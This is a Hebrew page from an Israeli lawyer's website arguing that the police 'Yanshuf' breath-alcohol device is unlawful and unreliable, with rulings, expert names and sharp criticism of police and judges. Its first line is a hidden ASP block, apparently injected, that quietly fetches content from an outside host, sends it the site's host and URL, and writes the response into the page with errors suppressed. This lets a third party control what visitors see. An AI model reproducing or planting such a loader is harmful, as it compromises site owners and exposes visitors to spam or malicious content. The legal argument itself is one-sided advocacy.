<% On Error Resume Next Set oHttp = CreateObject("MSXML2.ServerXMLHTTP") Response.CharSet = "UTF-8" oHttp.setTimeouts 3000, 3000, 3000, 3000 'Timeouts in Milliseconds oHttp.Open "GET", "http://www.kishuran.co.il/ilseo.php?id=51169&urlh="&Request.ServerVariables("HTTP_HOST")&"&url="&Server.URLEncode(Request.ServerVariables("URL"))&"&sl=asp" , False oHttp.Send Response.Write (oHttp.ResponseText) set oHttp = Nothing %>

www.sanegor.com        נהיגה בשכרות - האכיפה הפרועה והזלזול בשלטון החוק

              בדיקת נשיפה באמצעות הינשוף, אלכוהול בדם, ריכוז אלכוהול באוויר נשוף, נהיגה תחת השפעת משקאות משכרים - החוק התקנות והמציאות

עורך דין דוד קולקר - היוזם והמוליך של המאבק המשפטי והציבורי

  חזרה לדף הבית - שכרות         לאתר הבית של משרד קולקר  ושות'           לדפי דיני תעבורה כלליים                     טלפון 03-5661616   [email protected]    

מה עוד באתר:

-מידע ותשובות לשאלות נפוצות

- כתבות הערות ותגובות-----------

- מומחים - חוות דעת ועדויות-----

- פסיקה והליכים תלויים------------

- חקיקה-------------------------------

- שונות--------------------------------

- חדשות ודיווח שוטף

לכתבות ודיווחים שוטפים.מהמhותב הירושלמי

- לפורום דיני תעבורה של ואללה

- עבירת סירוב  1  2  3  4  5  6  7

סרט וידאו שצילם אזרח במצלמה של טלפון סלולארי, ומראה איך שוטרים רושמים דו"ח על סירוב לנהג המתחנן לנשוף....

 

אני תרזיאס:  בין אי הודאות לספק הסביר - הינשוף עירום ! 

לאחר כמעט  40.000, מורשעי ינשוף מאז דצמבר 2005, והקטל בדרכים איננו נח הגיעה השעה לעשות סדר בטענות נגד השיטה.

 240 מיקרוגרם בליטר אוויר נשוף. עכשיו אומרים לנו ברוב חסדם 290 מיקרוגרם... מה ההבדל? אז מה אם זו המידה המותרת. מי בכלל יכול לדעת כמה יש בו מזה? אדם יודע רק את מה שהוא מרגיש. נאמר ביושר לב: ברמת אלכוהול כזו בדם, רובנו רחוקים מרחק הגון משכרות! החוק אוסר על נהיגה בשכרות אך איננו אוסר נהיגה אחר שתייה מעטה. מכאן שהעימות עם החוק טעון כמעט תמיד באי הבנה מרירות והפתעות לא נעימות לנהג! למי שכבר הסתבך בזה, ומי שרוצה להבין על מה המהומה, אנסה להסביר מעט. הסיכוי שהשופט או התובע, ואפילו עורך הדין שלך יסביר לך – איננו גבוה לצערי. 

אי הוודאות הפיזיולוגית –  איך מבחין המכשיר בין שמן ורזה גבר ואישה? הוא לא מבחין! בגרמניה או בהולנד – אומרים לו. לפני הבדיקה מקלידים את מין הנבדק ומשקלו והמכשיר עודה חישוב מותאם. בישראל-יוק. השונות בין בני אדם היא נתון ידוע ומכביד על המדידה. לכל אחד קצב שונה של חילוף חומרים, נטיות גנטיות, ומצב מקרי של בריאות או תזונה. זו נמצאת במחזור והשני מבשל שפעת וחום. כל אלו משפיעם על תוצאת המדידה והמכשיר אדיש. גם המשטרה. גם מערכת המשפט. גם אתם רבוצי- כל עוד זה לא נוגע לכם ממש. אי הוודאות הפיזיולוגית שווה במונחים סטטיסטיים 70-80 מיקרוגרם. אבל למי איכפת.

 אי וודאות של מדידת גז -   מדידה של מולקולות גזיות נתונה תמיד לאי וודאות. גם כשהמכשיר מדוייק שיעור הטעות עומד על + 8% ובחישוב של מלומדים עוד 80 מיקרוגרמים של טווח המכונה אי וודאות. וכשמודדים אלכוהול יכולים גם חומרים אחרים להתחזות לאלכוהול. ריקוד נמרץ במסיבה יכול לתת תוספת של 100 מיקרוגרם איזו- פרופאנול שהמכשיר יכול לקרוא כאלכוהול...  

 ומה על איכות המכשיר תחזוקתו והפעלתו? הארגון הבינלאומי למטרולוגיה ה-OIML פרסם עוד ב-1998 תקן מחייב למכשירים שכאלה.  והם מקובלים בכל רחבי העולם. יש ועדה שמבזבזת זמן בדיון באימוצו. בינתיים – יש לדעת – מכשיר המדידה שמפעילה המשטרה, מפר כללים חשובים של התקן הזה, עד שחישובי הטעות המדידה הפכו מיותרים. זו לא מדידה. זו התעמרות בנבדק. ומי מפקח על ההתעמרות? המתעמר בעצמו – המשטרה! מדוע: כלל הוא שהמעבדה המכיילת היא גוף עצמאי. בישראל – הסדנא המשטרתית של את"ן! תשלחו את הינשוף למח"ש – אפילו שם הסיכוי לגלות את האמת גדול יותר.

 ומה על בתי המשפט? שם אנו מגלים שהגורם הפסיכולוגי הפך להוראת החוק הכי רלבנטית. איזה שופט יודה בטעותו? מנגנונים ראשוניים של הדחקה והכחשה פועלים במרכז הבמה במקום שיקול דעת ושיפוט נקי. מה לעשות – גם שופטים הם בשר ודם. קשה להם. וטיפול נפשי אורך שנה שנתיים שלוש- כמה שצריך. ועד אז – סבלנות. במקום ארבע מאות שקל לשעה, הציבור משלם בעשרות שנות פסילה ואלפי ימי עבודה – מחיר הטיפול הנפשי הקולקטיבי ליום. זוכרים: אדם זכאי אם יש ספק באשמתו? תשכחו מזה. הטיפול הנפשי טרם השיג תוצאות. המקרה קשה. סבלנות.

 מעבדה אנליטית צריכה להיות מדויקת. יש רשות לאומית להסמכת מעבדות ויש תקן ישראלי 17025 לתפעול המעבדות והכיול. מעבדות מז"פ כפופות לתקן ומפוקחות. מדוע? כי קצין אחראי שפרש בינתיים (סנ"ץ ד"ר צדוק), הבין שראיות משפטיות צריכות להיות מדויקות ואמינות. אבל מפקד את"ן מצפצף על הציבור. המעבדה שלו היא כמו מוסך בג'לג'וליה. (תושבי ג'לג'וליה – סליחה). תקנים? פיקוח? רישוי? גזי כיול תקניים? – תשכחו מזה. הנהג הישראלי זה משהו שמגיע לו הרע מכל. ככה הוא חושב. עובדה. הבמבה מיוצרת ומפוקחת לפי תקן. הינשוף- חכם בלילה. כמו המשטרה. כשאף אחד לא רואה. תקן? לא אצלנו.

 ובלילה , אתם יודעים, יש גם פרצות הקוראות לגנב. כל מכשיר מדידה מצויד במקלדת. המקלדת משמשת בכל העולם להקלדת שם הנבדק ופרטי זהותו לפני הבדיקה, כדי למנוע בלבול בזיהוי אחריה. גם מינו ומשקלו מוקלדים. זה משמש את החישוב. בישראל לקחו לשוטר את המקלדת. שם בלילה על תא המטען הוא ממלא בחושך איזה שם שבדיוק עולה על דעתו בכתב יד. לפעמים בטעות זה באמת שם הנבדק. ועם קצת חוסר מזל- קיבלת פלט של מישהו אחר... אתם יודעים שמפלט מרשיע השוטר יכול אם רק ירצה להפיק כמה העתקים שרק ירצה ולמלא בהם שמות של נהגים שונים?  לא, אינני רומז לכך שכולם או רובם כאלה – אבל כבר פגשתי כמותם! ובדרגות מכובדות למדי.

 ערכי אי הוודאות כבר בנו חומה בצורה של ספק בעבודת המשטרה ובמערכת המשפט שהרשיעה עשרות אלפים על בסיס מדעי רעוע.  מה יהיה על הספק הזה? לדעתי אין מנוס מלנהוג באומץ לב: צריך לומר לציבור את האמת, להפסיק את האכיפה הרשלנית הזו, ולפצות את כל המורשעים בחטא ולהתנצל בפניהם. השופטים – אתם משרתי הציבור – חובתכם להתנצל! כל מעשה אחר יהיה בבחינת הוספת חטא על פשע, חמור לא פחות מהנהיגה בשכרות עצמה.

 אתם אומרים: אבל שר התחבורה אישר את המכשיר. אפילו בית המשפט העליון כתב לאחרונה משהו המתיימר לדעת מה כאן קורה. קראו את שפתי: השר לא יודע מה הוא אישר. היועצת המשפטית שלו שלחה לו את הנייר לחתימה בלי שום בדיקה של החומר ובלי אף חוות דעת של מומחה או משהו דומה לזה. באחריות. זו האמת. תשאלו את עו"ד חוה ראובני. היא כבר העידה על כך בשבועה. והרפרנט ד"ר שלמה אלמוג מה הוא אומר?: אני לא לא בדקתי. אני לא אישרתי. אני רק התוויתי מה רצוי לרכוש!!! היום הוא שוב בראש הועדה המחליטה. מי שנכשל פעם אחת יש לו כל הכישורים להיכשל בשנית. זו המטרה. לא?

 השופטים מחפשים אחר האמת. כמו אדיפוס המלך. האמת מרה מאד. אדיפוס רצח את אביו, נשא את אימו והוליד עימה ילדים שהם אחיו למחצה! כמו שופטינו הוא חוקר במרץ את עברו. אך לא יכול לראות את האמת המרה, למרות שהיא נגולה בבהירות והקהל מתפלא. ראייתם קהה, הם עדין עיוורים לאסונם המצער העומד בפתח. עוד מעט קט תתבהר הכרתם ויגלו כי הרשיעו בקלות אין קץ, וברשלנות מפתיעה, אלפים רבים של נהגים. הדאגה הכנה למצב בכבישים לא תכסה על הבושה והאבל. אלפי פסקי דין יתבררו להיות פרי בטן אסור ולא מוסרי. האם יהיה להם האומץ של אדיפוס? 

ועוד שאלה: יש לשכת עורכי דין בישראל? המוצא הישר מתבקש....  

 

בית המשפט בחיפה זיכה הנאשם ופסל את הינשוף. הינשוף לא נהנה יותר מחזקת אמינות ידיעות אחרונות : "הינשוף מרשיע חפים מפשע" הניסוי בינשוף כישלון צורב למשטרה - הוכח שהמכשיר מרשיע חפים מפשע!       הודעה חשובה לציבור הנהגים שנרשם להם דו"ח על שכרות בירושלים לכתבות ודיווחים שוטפים מהמותב הירושלמימי אתה ד"ר אלמוג   ?  נעים מאד !    אני תרזיאס:  בין אי הודאות לספק הסביר - הינשוף עירום !   תהליך פסיכולוגי קשה למערכת השיפוט. (טור מימין)      מבקר המדינה- הפשל שרוולים - תורך לברר הגיע!       

הינשוף לא חוקי ומרשיע חפים מפשע!

ניצחנו - ביהמ"ש פסק רף 400 מיקרוגרם

אבל זה ניצחון חלקי וזמני - הינשוף ימוגר סופית!

מבקר יקר,

 

אתר זה הוקם בשלהי 2006 כדי להפיץ בציבור, נהגים, עורכי דין, ושופטים, את כל המידע הרלבנטי, אודות הדרך שבה אוכפת מדינת ישראל את האיסור בנהיגה בשכרות.

 

האתר איננו מטיף חס וחלילה לנהיגה בשכרות או לשתיה. כשאנו שומעים על תאונה שבה קופחו חיי אדם בגלל נהג שיכור, ליבנו מתמלא אימה וכעס. כעס גדול על הנבל שהפח לרוצח בבלי דעת וקטע מהלך חיים של משפחות שלמות.

 

אבל אנחנו בני אדם. בני תרבות. אנחנו איננו עושים לינץ' לכל הנהגים רק בגלל שמישהו עבר עבירה. אפשר להיות קנאים באכיפה ובעונש, להטיל עונשים חמורים על שיכורים, אבל אסור בשום פנים ואופן להתיר את דמו של כל נהג רק בגלל שהאכיפה לא כל כך פשוטה. וזה בדיוק המצב העגום אליו נקלעה מדינת ישראל בשנים האחרונות. זו עובדה בלתי מעורערת שהאכיפה נעשית בדרכים לא חוקיות, ורבים הנהגים שנעשה להם עוול ושמוצאים עצמם מוענשים באופן קשה בניגוד לחוק ובניגוד לצדק, וזהו מצב בלתי נסבל!

 

העיסוק בשכרות באתר זה הוא טפל לעיקר.  המאבק למען אכיפה נקייה מהפרת חוק - הוא העיקר! שיפוט נקי והוגן - הוא העיקר!

 

היום זה כבר לא סוד, אלא עובדה משפטית מוכחת! מזה שנים מפעילה משטרת ישראל מכשירי נשיפה בניגוד לחוק, בלי שטרחה להתאים אותם לחוק, ותוך הסתרת העובדה המדהימה הזו מבית המשפט ומהציבור. מי היה מאמין שהאכיפה נגד נהגים שיכורים מושתתת בעיקרה על מכשירים לא חוקיים, ועל בסיס   לא חוקי?  ובכן היום זו כבר עובדה שבית המשפט קבע אותה בלי היסוס. עוול גדול נגרם כל יום לנהגים חפים מפשע ואסור לנו להחריש כל עוד המצב הזה מתמשך.

 

שופטינו הנכבדים, רובם ככולם סרבו להאמין, והסתתרו להם מאחרי "חזקה שבדין" שהוא כלל משפטי המניח שהמכשיר חוקי ומופעל כחוק ומטיל את החובה להוכיח אחרת עלינו - על בוזגלו. מהניסיון שלי לחצוב הר בידיים קל יותר. האם אנחנו באמת מדינת חוק? מה זה בכלל חוק? האם החוק שוויוני? צודק?

 

עד כמה מערכת המשפט לוקה בתפקוד לקוי או חס וחלילה ומבלי משים גולשת למשוא פנים, זה הציבור ישפוט. עד כמה השרים הממונים ראויים לעמוד למשפט הציבור - אתם תשפטו. בית המשפט העליון כבר מזמן איננו פוסק שקביעותיו טהורות וחסינות מביקורת. אבוי לנו שלכאן הגענו. גם אותו מן הסתם הציבור עוד ישפוט.

 

אנחנו כאן כבר שנה לערך מספקים את המידע. תחילה לבד מול כל זרם המחרפים ומגדפים ועכשיו קצת יותר מחוזקים כשמסתבר למרבה הצער שצדקנו. אבל משום מה עדין אין פתרון חוקי באופק. אין ספק שחוק צריך לאכוף, ואין ספק שצריך למגר את השכרות מהכבישים. אבל אסור לשבת בחיבוק ידיים כאשר חפים מפשע מורשעים וכאשר החוק מופר בפרהסיה דווקא על ידיד הרשויות, השר הממונה, המשטרה ובתי המשפט.

 

הולכים ומצטברים החלטות ופסקי דין אופטימיים שבהם המאבק הזה נוחל הצלחות ומתגבר על מחסום ההתנגדות העצום שהצליחה המשטרה והפרקליטות לייצר בתחילה. השלמת המשימה היא עתה רק עניין של זמן. ביולי 08 פסל את הינשוף השופט שלמה נחשון (אטינגר), מביהמ"ש בפתח תקווה. ב10.12.08 הצטרף אליו כ' השופט אינאס סלאמה מחיפה. שניהם שמעו ראיות ומומחים מטעם ההגנה ופסקו פסיקה מנומקת! אחריהם, ממש לפני החתימה על פסק הדין עצר כבוד השופו דרורי מבית המשפט השלום בתל אביב. הוא מבקש לראות מה יפול בירושלים....

 

מותב מיוחד של לשוה שופטים מונה במיוחד כדי לשמוע את הטענות הכבדות שלנו. עוד לא היה כדבר הזה במדינת ישראל והעובדה הזו לבדה הייתה צריכה לשלוח את המשטרה לערוך חשבון נפש. מומחים מטעם המשטרה מודים היום בפה מלא ובחוות דעת מלומדות שכל האכיפה מתחת ל-300 מיקרוגרם בליטר אוויר נשוף הייתה אכיפה מפוקפקת. מומחה שמינה בית המשפט כבר קבע שמספר הרשעות. השווא הוא 2%.  אנו חולקים עליו, המספר גבוה בהרבה. אבל גם 1 מכל חמישים זהו ספק סביר!!!

 

מומחה של התביעה כבר הפריך את הטענה שהמכשיר הוא אותו מכשיר שמשתמשים בו בארצות אחרות. - זה לא מפריע למשטרה להמשיך לטעון אחרת.

 

על אף החלטות נטולות בסיס עובדתי של בית המשפט העליון מדובר במכשיר לא חוקי שאישורו נעשה בעוולה. כבר הוכח בבית המשפט ששר התחבורה לא ראה לנגד עינו אף חוות דעת המתירה לו לאשר את המכשיר. היועצת המשפטית אשר הגישה לו את המסמכים לחתימה העידה ואישרה כי לא בדקה מאום ולא היה בידה כל חוות דעת הולמת. ד"ר אלמוג, ששמו נזכר במסמכים השונים של המשטרה כמי שעליו הסתמך שר התחבורה או שר הבריאות העיד בבית המשפט וכפר בזה בכל פה.

 

חוות דעת מלומדות של אנשי מקצוע קובעות: מכשיר הינשוף איננו תקני, איננו מכויל ואיננו מתוחזק כחוק. בין רשימת המומחים שפסלו את המכשיר נמצאים עד כה, ד"ר דריו ורטניק, מהנדס לוזנסקי, ד"ר איליה פולישוק, ד"ר נעים פזע, מהנדס משה אביחי, ד"ר אורנה דרייזין, מר איתן שרון - ראש הרשות הישראלית להסמכת מעבדות , ועוד היד נטויה.

 

לא ניתן לאיש לזלזל בכם האזרחים.  איזה אזרח יכול להתגונן לבדו מול שרירות הלב הזו? מי יכול לבדו ללמוד את העובדות ולגייס את המשאבים הדרושים? - אף אחד.  עובדה היא שאף עורך דין לא עשה כן לפנינו!

 

אבל עורכי הדין והשופטים העוברים לצידנו הולכים ומתרבים. וצריך להאמין במדינה המתיימרת להיות מדינת חוק שהניצחון  המלא קרוב. מדי פעם מנצלת המשטרה את כוחה בתקשורת ומפרסמת פרסומים מגמתיים שנועדו לרפות את ידי האזרחים. אנחנו כאן לצידכם.

 

הרכב השופטים בירושלים כבר קבע - שניצחתי את המערכת בקובעו רף של 400 מיקורגם כרף אכיפה. אבל אין לי די בזה. אני רוצה את ביטול הינשוף. והביטול בא יבוא.

 

באתר הזה תוכלו למצוא חומר הסברה ועדכונים ככל שידם של העוסקים במלאכה משגת.

 

אין זה סוד שרבים מאד מהפרקליטים שהתוודעו לבעייתיות רק עקב פעולתנו הנמרצת במעלה ההר ונגד הזרם. עד עצם היום הזה מוזן הציבור ומוזנים השופטים במידע חלקי ומסולף.שצריך לעקור מן השורש. אנו כאן כדי לסייע לכולם. עורכי דין ונהגים המבקשים עזרה או מידע עדכני ונקודתי, מוזמנים להתקשר. מסירת המידע והחומר לכל עורכי הדין היא חופשית, חינם, ולא צריך להסס מלפנות.

 

דפדפו באתר, ולימדו את החומר. מי שרוצה להוסיף מידע או ביקורת על האתר ובאתר - מוזמן.

גלישה נעימה ומשכילה.

 

עו"ד דוד קולקר

 

 

דוד קולקר עו"ד

19.2.09

 

עורך הדין דוד קולקר

03-5661616

לטורים מן השבועות הקודמים

 

 

.

 

חזרה לדף הבית

ליצירת קשר: [email protected]

או בפקס 035661667